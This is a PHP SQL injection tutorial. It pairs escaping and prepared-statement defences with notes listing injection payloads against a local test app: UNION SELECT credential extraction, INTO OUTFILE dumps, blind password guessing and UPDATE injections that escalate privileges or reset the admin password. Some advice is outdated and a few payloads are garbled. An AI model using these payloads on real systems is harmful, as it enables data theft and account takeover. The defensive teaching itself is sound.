PHP SQL injection attacks and precautions

Source: Internet
Author: User
Tags: sql injection attack, sql injection prevention
Suppose the input is:

    // supposed input
    $name = "ilia'; DELETE FROM users;";
    mysql_query("SELECT * FROM users WHERE name='{$name}'");

The statement the database ends up executing is:

    SELECT * FROM users WHERE name='ilia'; DELETE FROM users;

This has disastrous consequences for the database – all records have been deleted.

If the database is MySQL, the mysql_query() function fortunately does not execute several statements in a single call (stacked statements are not allowed), so this particular payload fails. If you are using a database such as SQLite or PostgreSQL, whose PHP functions do accept stacked statements, the result is a catastrophe.

As shown above, SQL injection means submitting unsafe data to the database in order to change the query. To help prevent it, PHP ships with a low-level, preliminary input filter known as Magic Quotes (the magic_quotes_gpc setting in php.ini). When magic_quotes_gpc is enabled, single quotes, double quotes and a few other characters in every input string are automatically prefixed with a backslash (\).

Magic Quotes is not a general solution, however: it does not block every potentially dangerous character, and it is not enabled on many servers. So we need other ways to prevent SQL injection.

Many databases provide their own input-escaping functions. For example, PHP's MySQL extension has mysql_real_escape_string(), which escapes the special characters that could otherwise break or alter a database operation. For example:

    // if magic quotes is enabled, strip the backslashes PHP already added
    if (get_magic_quotes_gpc()) {
        $name = stripslashes($name);
    }
    // then escape exactly once, using the database's own escaping function
    $name = mysql_real_escape_string($name);
    mysql_query("SELECT * FROM users WHERE name='{$name}'");

Note that before calling the database's escaping function you must check whether magic quotes is enabled, as in the example above; otherwise the data is escaped twice and the query breaks. If magic quotes is on, the backslashes it added must be removed first to recover the real data.
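The "escape exactly once" rule above, as an added example that is not part of the original article. It uses mysqli_real_escape_string() in place of the removed mysql_real_escape_string() (an assumption for PHP 7 and later); the users table and name column are taken from the article's own query, and the connection credentials are placeholders.

```php
<?php
// Added example, not from the original article: the page's name lookup with the
// value escaped exactly once. mysqli replaces the removed mysql_* functions (an
// assumption for PHP 7+); `users`/`name` come from the page's query.

// Return the value as the user actually sent it. If magic quotes was on, PHP
// already added backslashes, and escaping again would double them (the "two
// repetitions" the article warns about).
function raw_input(string $value): string
{
    if (function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()) {
        return stripslashes($value);
    }
    return $value;
}

// Build the query with the value escaped once and then quoted. The quotes are
// essential: escaping alone does not help for an unquoted value such as 1 OR 1=1.
function build_user_query(mysqli $db, string $name): string
{
    $safe = mysqli_real_escape_string($db, raw_input($name));
    return "SELECT * FROM users WHERE name='{$safe}'";
}

function find_user(mysqli $db, string $name): ?array
{
    $result = mysqli_query($db, build_user_query($db, $name));
    $row = $result ? mysqli_fetch_assoc($result) : null;
    return $row ?: null;
}

// Usage with the article's payload (placeholder credentials, not a real server):
// $db = new mysqli('localhost', 'app', 'secret', 'appdb');
// echo build_user_query($db, "ilia'; DELETE FROM users;");
// find_user($db, "ilia'; DELETE FROM users;");
```

With the payload from the start of the article, the single quote inside the value is escaped, so the whole string stays a (non-matching) name literal and the DELETE never becomes a separate statement. mysqli_real_escape_string() needs the connection because the correct escaping depends on the connection's character set.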

Besides preprocessing string data as described above, you must also preprocess binary data before storing it in the database. Otherwise the data may conflict with the database's own storage format, crashing the database, losing records, or even losing the whole database. Some databases, such as PostgreSQL, provide a function pg_escape_bytea() specifically for encoding binary data, similar to Base64 encoding.

For example:

    // for plain-text data use:
    $safe_text = pg_escape_string($regular_string);
    // for binary data use:
    $safe_bytes = pg_escape_bytea($binary_data);

The same mechanism should also be used in another case: when the database system itself does not support multi-byte languages such as Chinese or Japanese, since some of their byte sequences overlap the ASCII and binary ranges.
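The text-versus-binary escaping just described, carried through as an added example that is not part of the original article. It assumes a PostgreSQL table files with a text column name and a bytea column content; the table, the column names and the connection string are assumptions for illustration.

```php
<?php
// Added example, not from the original article: the page's two PostgreSQL
// escape functions applied to a text column and a bytea column of an assumed
// `files` table (name text, content bytea). The connection string is a placeholder.

function store_file($conn, string $name, string $binary): bool
{
    // Text goes through pg_escape_string (the quotes are added around it here);
    // bytes go through pg_escape_bytea, which encodes NUL, quotes, backslashes and
    // multi-byte sequences so they can neither end the literal early nor be misread
    // by the storage format. Passing $conn makes both follow the connection's settings.
    $sql = sprintf(
        "INSERT INTO files (name, content) VALUES ('%s', '%s')",
        pg_escape_string($conn, $name),
        pg_escape_bytea($conn, $binary)
    );
    return pg_query($conn, $sql) !== false;
}

// Reading the row back: bytea is returned in its encoded form and must be decoded.
function load_file($conn, string $name): ?string
{
    // The lookup value travels as a parameter, separate from the SQL text.
    $result = pg_query_params($conn, 'SELECT content FROM files WHERE name = $1', [$name]);
    if ($result === false || pg_num_rows($result) === 0) {
        return null;
    }
    return pg_unescape_bytea(pg_fetch_result($result, 0, 'content'));
}

// Usage (placeholders; constructed bytes containing a quote, a NUL and a backslash):
// $conn = pg_connect('host=localhost dbname=app user=app password=secret');
// store_file($conn, "photo'1.png", "\x89PNG\x00\x1a'\\");
// $bytes = load_file($conn, "photo'1.png");   // identical to the stored bytes
```

The point of the two different functions is that a value escaped with pg_escape_string() is still interpreted as text by the server, so arbitrary bytes (a NUL byte, or a multi-byte sequence the server's encoding does not accept) would be rejected or mangled; pg_escape_bytea() encodes them into a representation the bytea type accepts, and pg_unescape_bytea() restores the original bytes.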

Two recommended articles on PHP SQL injection prevention: one provided by 360 Security, the other a collection of PHP anti-SQL-injection code gathered by another author, very powerful and very useful.
    • PHP anti-SQL-injection code (provided by 360)
    • PHP code to filter and prevent SQL injection vulnerabilities

Note, however, that escaping does not cover LIKE wildcards: a value containing % or _ can still change the meaning of a pattern such as LIKE 'abc%'.

PHP SQL injection implementation (test code, very safe)

The key to SQL injection is constructing SQL statements; only by using SQL flexibly can a powerful injection string be built. After finishing my study I wrote these notes for later use. I hope you understand the basics of SQL before reading the content below. The code in the notes comes from the network.

=== Basic part ===

Queries against this table:

    http://127.0.0.1/injection/user.php?username=angel' and LENGTH(password)='6
    http://127.0.0.1/injection/user.php?username=angel' and LEFT(password,1)='m

UNION statement:

    http://127.0.0.1/injection/show.php?id=1' union select 1,username,password from user/*
    http://127.0.0.1/injection/show.php?id=' union select 1,username,password from user/*

Export to a file:

    http://127.0.0.1/injection/user.php?username=angel' into outfile 'c:/file.txt
    http://127.0.0.1/injection/user.php?username=' or 1=1 into outfile 'c:/file.txt
    http://127.0.0.1/injection/show.php?id=' union select 1,username,password from user into outfile 'c:/user.txt

INSERT statement:

    INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', '$username', '$password', '$homepage', '1');

Construct the homepage value as:

    http://jbxue.com', '3') #

and the SQL statement becomes:

    INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', 'angel', 'mypass', 'http://jbxue.com', '3') # ', '1');

UPDATE statement: I like this kind of thing. First understand this SQL statement:

    UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='$id'

If this SQL is modified in the following ways, injection is achieved. 1: modify the homepage value to http://jbxue.com', userlevel='3 and the SQL statement becomes

    UPDATE user SET password='mypass', homepage='http://jbxue.com', userlevel='3' WHERE id='$id'

(userlevel is the user's privilege level.) 2: modify the password value to

    mypass)' WHERE username='admin' #

The SQL statement then becomes

    UPDATE user SET password='MD5(mypass)' WHERE username='admin' #)', homepage='$homepage' WHERE id='$id'

3: modify the id value to ' OR username='admin and the SQL statement becomes

    UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='' OR username='admin'

=== Advanced part ===

Commonly used MySQL built-in functions: database(), USER(), SYSTEM_USER(), SESSION_USER(), CURRENT_USER(), version(), SUBSTRING(), MID(), char(), load_file(), ...

Applying the functions:

    UPDATE article SET title=database() WHERE id=1
    http://127.0.0.1/injection/show.php?id=-1 union select 1,database(),version()

    SELECT * FROM user WHERE username=char(97,110,103,101,108)
    # char(97,110,103,101,108) equals 'angel' (decimal character codes)

    http://127.0.0.1/injection/user.php?userid=1 and password=char(109,121,112,97,115,115)
    http://127.0.0.1/injection/user.php?userid=1 and LEFT(password,1)>char(+)
    http://127.0.0.1/injection/user.php?userid=1 and ORD(MID(password,3,1))>111

Determine the number and types of the fields in the table:

    http://127.0.0.1/injection/show.php?id=-1 union select 1,1,1
    http://127.0.0.1/injection/show.php?id=-1 union select char($),char($),char(97)

Guess the table name:

    http://127.0.0.1/injection/show.php?id=-1 union select 1,1,1 from

Cross-table query to get the username and password:

    http://127.0.0.1/ymdown/show.php?id=10000 union select 1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1

Other:

    # verify the first character of the password
    http://127.0.0.1/ymdown/show.php?id=10 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ORD(MID(password,1,1))=49
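The request patterns listed in the basic and advanced parts are exactly what a defender wants to spot in the web server's access log. Below is an added example that is not part of the original notes: a small scanner that flags requests carrying those markers. The log lines are constructed for illustration, and the pattern list is a starting point for detection, not a complete filter (encoded or obfuscated variants are not covered).

```php
<?php
// Added example, not from the original notes: flag access-log requests that carry
// the injection markers shown in the notes' test URLs. Log lines are constructed;
// the patterns are a starting point, not a complete filter.

const INJECTION_PATTERNS = [
    'union select' => '/union\s+select/i',
    'into outfile' => '/into\s+outfile/i',
    'load_file'    => '/load_file\s*\(/i',
    'char()'       => '/\bchar\s*\(\s*\d+(?:\s*,\s*\d+)*\s*\)/i',
    'ord(mid())'   => '/ord\s*\(\s*mid\s*\(/i',
    'sql comment'  => '/\/\*|#/',
];

// Decode the request URL first: browsers send "union%20select", not "union select".
function scan_request(string $url): array
{
    $decoded = urldecode($url);
    $hits = [];
    foreach (INJECTION_PATTERNS as $label => $regex) {
        if (preg_match($regex, $decoded)) {
            $hits[] = $label;
        }
    }
    return $hits;
}

// Pull the request target out of each common-log-format line and scan it.
function scan_log(array $lines): array
{
    $findings = [];
    foreach ($lines as $line) {
        if (!preg_match('/"(?:GET|POST)\s+(\S+)/', $line, $m)) {
            continue;
        }
        $hits = scan_request($m[1]);
        if ($hits) {
            $findings[] = ['url' => $m[1], 'hits' => $hits];
        }
    }
    return $findings;
}

// Constructed sample log lines: one normal request, two carrying markers from the notes.
$sample = [
    '127.0.0.1 - - [10/Oct/2020:13:55:36 +0000] "GET /injection/show.php?id=1 HTTP/1.1" 200 512',
    '127.0.0.1 - - [10/Oct/2020:13:55:40 +0000] "GET /injection/show.php?id=-1%20union%20select%201,database(),version() HTTP/1.1" 200 733',
    '127.0.0.1 - - [10/Oct/2020:13:55:44 +0000] "GET /injection/user.php?username=angel%27%20into%20outfile%20%27c:/file.txt HTTP/1.1" 200 90',
];

foreach (scan_log($sample) as $f) {
    echo $f['url'], ' => ', implode(', ', $f['hits']), PHP_EOL;
}
```

Run against the three constructed lines, the first produces nothing and the other two are reported with the union select and into outfile labels. In practice a hit is a trigger for review of the application's query construction, not proof of a successful attack; a 200 response with a larger-than-usual body on such a request is the stronger signal.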

=== Injection prevention ===

Server side: set magic_quotes_gpc to On and display_errors to Off.

Encoding side:

    $keywords = addslashes($keywords);
    $keywords = str_replace("_", "\_", $keywords);
    $keywords = str_replace("%", "\%", $keywords);

For numeric parameters use intval(); for string parameters in an SQL statement, wrap the value in single quotes. The code below prevents injection:

    if (get_magic_quotes_gpc()) {
        // magic quotes already added backslashes: remove them to get the raw value
        $keywords = stripslashes($keywords);
    }
    // escape exactly once, then neutralise the LIKE wildcards
    $keywords = mysql_real_escape_string($keywords);
    $keywords = str_replace("_", "\_", $keywords);
    $keywords = str_replace("%", "\%", $keywords);
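The LIKE-wildcard rule and the intval() rule above combined into one search function, as an added example that is not part of the original notes. It uses a mysqli prepared statement (an assumption; the notes use mysql_* functions), and the article table with its title and category_id columns is an assumption for illustration.

```php
<?php
// Added example, not from the original notes: the notes' rules for the search
// page (escape LIKE wildcards in string keywords, intval() for numeric ids) applied
// through a mysqli prepared statement. Table `article` and its columns are assumed.

// Make a user-supplied keyword match literally inside a LIKE pattern. Backslash is
// MySQL's default LIKE escape character, so "50%" becomes "50\%" and "a_b" becomes
// "a\_b". The backslash itself is escaped first so an input "\" cannot eat the
// escape we add after it.
function escape_like(string $keywords): string
{
    if (function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()) {
        $keywords = stripslashes($keywords);   // raw value first, escape once
    }
    return str_replace(['\\', '%', '_'], ['\\\\', '\%', '\_'], $keywords);
}

// Numeric parameter: intval() yields 0 for anything that is not a number, so a
// quoted or stacked payload can never reach the statement as SQL.
function category_id(string $raw): int
{
    return intval($raw);
}

function search_articles(mysqli $db, string $keywords, string $categoryRaw): array
{
    $pattern = '%' . escape_like($keywords) . '%';
    $cat     = category_id($categoryRaw);

    // The pattern and the id are bound as values: with a prepared statement no
    // quote escaping is needed, but the wildcard escaping above still is, because
    // % and _ are interpreted by LIKE itself, not by the SQL parser.
    $stmt = $db->prepare('SELECT id, title FROM article WHERE title LIKE ? AND category_id = ?');
    $stmt->bind_param('si', $pattern, $cat);
    $stmt->execute();
    $rows = $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
    $stmt->close();
    return $rows;
}

// Usage (placeholder credentials, constructed inputs):
// $db = new mysqli('localhost', 'app', 'secret', 'appdb');
// search_articles($db, '100%_off', "3' OR '1'='1");   // pattern %100\%\_off%, category 3
```

Two things the combination shows: a prepared statement removes the need for mysql_real_escape_string() but not for the wildcard escaping, since % and _ are meaningful to LIKE rather than to the SQL grammar; and intval() on the id makes the quote-based payload from the notes harmless even before the statement is prepared.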

Useful functions: stripslashes(), get_magic_quotes_gpc(), mysql_real_escape_string(), strip_tags(), array_map(), addslashes()
